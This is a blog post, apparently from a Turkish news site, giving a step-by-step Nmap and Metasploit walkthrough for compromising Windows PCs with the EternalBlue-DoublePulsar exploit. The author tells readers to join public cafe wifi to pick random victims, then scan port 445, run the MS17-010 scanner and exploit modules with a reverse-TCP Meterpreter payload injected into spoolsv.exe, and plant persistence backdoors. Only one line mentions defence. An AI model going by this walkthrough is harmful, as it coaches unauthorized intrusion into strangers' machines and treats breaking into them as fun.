Siber Güvenlik

Exploit Windows PC Using EternalBlue-DoublePulsar on Metasploit

Merhaba Pentester arkadaşlarım, Bu derste size ağda pentest yapmayı, hedef seçmeyi ve onlara erişim sağlamayı göstereceğim. Buradaki senaryo, önce bir keşif veya bilgi toplama yapacağız, ardından zafiyet taraması yapacağız ve son olarak da exploit yapacağız. Eternalblue ve DoublePulsar kullanacağız, Bu exploit birlikte iş birliğidir, pencerelerde arka kapı olarak kullanılan “EternalBlue” ve dll payload dosyasını enjekte etmek için kullanılan “Doublepulsar”. Nmap ve Metasploit’i de kullanacağız. Hadi terminale atlayalım!

Steps :
Reconnaisance > Vulnerability Scan > Exploit


Firstly, connect into wireless network, i used to connect into public wifi like cafe or public areas. Because it’s more fun of having random target right? I would not go into how could you get into that network, that would be so long tutorial btw. [inner backlink] I assume you have connected, now take a note to be identified later. Know your local IP !

My IP :
Gateway :
Netmask :

From here, now you know who you’re, where you’re, know your machine ID, and network infos.

Now start scanning and looking for target :). As usual we will using Nmap. By the way, i will resume to make it short, im interesting on EternalBlue and DoublePulsar exploit. Have your ever playing around with it? 😉 trust me its fun. And believe or not, that famous exploit still exists nowadays. Because what? Because the users is lol. Eternalblue and DoublePulsar is behind the wannacry ransomware, if you have windows machine then consider blocking all vulnerable ports of smbv1 services to prevent wannacry attack or EternalBlue and DoublePulsar Exploit. Abusing a vulnerability in Windows’ Server Message Block (SMB) on port 445, EternalBlue allowed the WannaCry ransomware to spread like a worm and hit over 200,000 machines within a few days only. Before WannaCry, however, a crypto-currency mining botnet dubbed Adylkuzz had been using the same exploit to compromise devices.

Run this command

nmap -v -p445 | grep open

Tadaaa, we got open port on 445. This port replaces the notorious Windows NetBIOS trio (ports 137-139), for all versions of Windows after NT, as the preferred port for carrying Windows file sharing and numerous other services.

Add to note:

Target IP :

Check the vuln, run this command :

nmap -v -p445 [Target IP] --script vuln

As you can see, this target is vulnerable to ms17_010.

Ok, next step, while firing up msfconsole, find that exploit located.

run this command :

locate ms17_010

Notice that there is two types of modules listed above, Auxiliary the scanner and Exploit. We will use the Auxiliary module and use different exploit module later. See this video to install EternalBlue DoublePulsar exploit modules.

Now switch to msfconsole window. First we use the scanner module to make sure the exploit run at least succeed ;).

Run this command:

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS [target IP]

Notice these output result:

[+] – Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7600)
[!] – Host is likely INFECTED with DoublePulsar! – Arch: x86 (32-bit), XOR Key: 0x36CE8729

The target machine is x86 / 32-bit.

Now its time to exploit !
run this commands :

use exploit/windows/smb/eternalblue_doublepulsar
set payload windows/meterpreter/reverse_tcp
set PROCESSINJECT spoolsv.exe

Exploit Succeed ! now we got meterpreter sessions with authoritive privilage. From here you can control this machine. run VNC, set RDP, set persistence backdoor to auto connect back to us. etc. We have pwned his/r windows machine.

SondakikaWorld CEO | Co Founder | Web Developer | Graphic Designer

Tepkiniz nedir?

İlgili Yazılar

1 of 7.551

Cevap bırakın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir